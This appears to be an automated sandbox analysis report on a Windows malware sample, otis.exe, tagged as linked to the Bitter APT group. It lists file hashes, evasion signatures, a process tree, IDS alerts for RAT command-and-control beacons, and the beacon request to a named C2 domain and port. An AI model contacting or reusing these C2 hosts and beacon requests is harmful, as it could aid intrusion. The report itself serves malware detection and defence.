Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
otis.exe

Overview

General Information

Sample name:otis.exe
Analysis ID:1554908
MD5:3d922c89c5f0f8f9a738bec3a24d0494
SHA1:d5b0ad895d5adbf919ed6771292410df924fdd00
SHA256:cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
Tags:aptBitterexeuser-smica83
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • otis.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\otis.exe" MD5: 3D922C89C5F0F8F9A738BEC3A24D0494)
    • cmd.exe (PID: 600 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1308 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5164 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6024 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2284 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2652 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6584 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1904 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7152 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3804 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3512 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4948 cmdline: "cmd.exe" /k echo smyytbFVD4:284992/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:05:15.387383+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449730TCP
2024-11-13T08:05:53.447362+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449758TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:05:30.239490+010028033053Unknown Traffic192.168.2.44973891.132.92.2319314TCP
2024-11-13T08:05:32.223185+010028033053Unknown Traffic192.168.2.44974091.132.92.2319314TCP
2024-11-13T08:05:34.237402+010028033053Unknown Traffic192.168.2.44974291.132.92.2319314TCP
2024-11-13T08:05:36.165379+010028033053Unknown Traffic192.168.2.44974491.132.92.2319314TCP
2024-11-13T08:05:38.174755+010028033053Unknown Traffic192.168.2.44974691.132.92.2319314TCP
2024-11-13T08:05:44.133604+010028033053Unknown Traffic192.168.2.44974891.132.92.2319314TCP
2024-11-13T08:05:46.204734+010028033053Unknown Traffic192.168.2.44975091.132.92.2319314TCP
2024-11-13T08:05:48.151428+010028033053Unknown Traffic192.168.2.44975291.132.92.2319314TCP
2024-11-13T08:05:50.100520+010028033053Unknown Traffic192.168.2.44975491.132.92.2319314TCP
2024-11-13T08:05:52.051668+010028033053Unknown Traffic192.168.2.44975691.132.92.2319314TCP
2024-11-13T08:05:54.029257+010028033053Unknown Traffic192.168.2.44975991.132.92.2319314TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:05:28.419802+010028111761Malware Command and Control Activity Detected192.168.2.449737192.121.170.1066969TCP
2024-11-13T08:05:30.395781+010028111761Malware Command and Control Activity Detected192.168.2.449739192.121.170.1066969TCP
2024-11-13T08:05:32.383336+010028111761Malware Command and Control Activity Detected192.168.2.449741192.121.170.1066969TCP
2024-11-13T08:05:34.302832+010028111761Malware Command and Control Activity Detected192.168.2.449743192.121.170.1066969TCP
2024-11-13T08:05:36.306609+010028111761Malware Command and Control Activity Detected192.168.2.449745192.121.170.1066969TCP
2024-11-13T08:05:38.282732+010028111761Malware Command and Control Activity Detected192.168.2.449747192.121.170.1066969TCP
2024-11-13T08:05:44.301388+010028111761Malware Command and Control Activity Detected192.168.2.449749192.121.170.1066969TCP
2024-11-13T08:05:46.335595+010028111761Malware Command and Control Activity Detected192.168.2.449751192.121.170.1066969TCP
2024-11-13T08:05:48.251740+010028111761Malware Command and Control Activity Detected192.168.2.449753192.121.170.1066969TCP
2024-11-13T08:05:50.227877+010028111761Malware Command and Control Activity Detected192.168.2.449755192.121.170.1066969TCP
2024-11-13T08:05:52.194039+010028111761Malware Command and Control Activity Detected192.168.2.449757192.121.170.1066969TCP
2024-11-13T08:05:58.423770+010028111761Malware Command and Control Activity Detected192.168.2.449766192.121.170.1066969TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: otis.exeReversingLabs: Detection: 42%
Source: otis.exeVirustotal: Detection: 52%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.3% probability
Source: otis.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49745 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49737 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49766 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49747 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49757 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49743 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49751 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49753 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49755 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49741 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49749 -> 192.121.170.106:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:49739 -> 192.121.170.106:6969
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49759
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 91.132.92.231:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: Joe Sandbox ViewASN Name: EDIS-AS-EUAT EDIS-AS-EUAT
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49758
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: unknownTCP traffic detected without corresponding DNS query: 192.121.170.106
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficDNS traffic detected: DNS query: federalrevenueboard.com
Source: otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000107000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000AF000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com
Source: otis.exe, 00000000.00000002.4126891226.0000021000149000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F9000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000270000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314
Source: otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5
Source: otis.exe, 00000000.00000002.4126891226.0000021000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P
Source: otis.exe, 00000000.00000002.4126891226.000002100019B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.0000021000130000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100016F000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001FA000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100024E000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.000002100021B000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210000F3000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.4126891226.00000210001B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h
Source: otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:93142
Source: otis.exe, 00000000.00000002.4126891226.000002100008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\otis.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8B3BFD0_2_00007FFD9B8B3BFD
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8B32680_2_00007FFD9B8B3268
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8A30780_2_00007FFD9B8A3078
Source: classification engineClassification label: mal64.troj.winEXE@37/0@1/2
Source: C:\Users\user\Desktop\otis.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03
Source: otis.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: otis.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\otis.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: otis.exeReversingLabs: Detection: 42%
Source: otis.exeVirustotal: Detection: 52%
Source: unknownProcess created: C:\Users\user\Desktop\otis.exe "C:\Users\user\Desktop\otis.exe"
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:284992/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
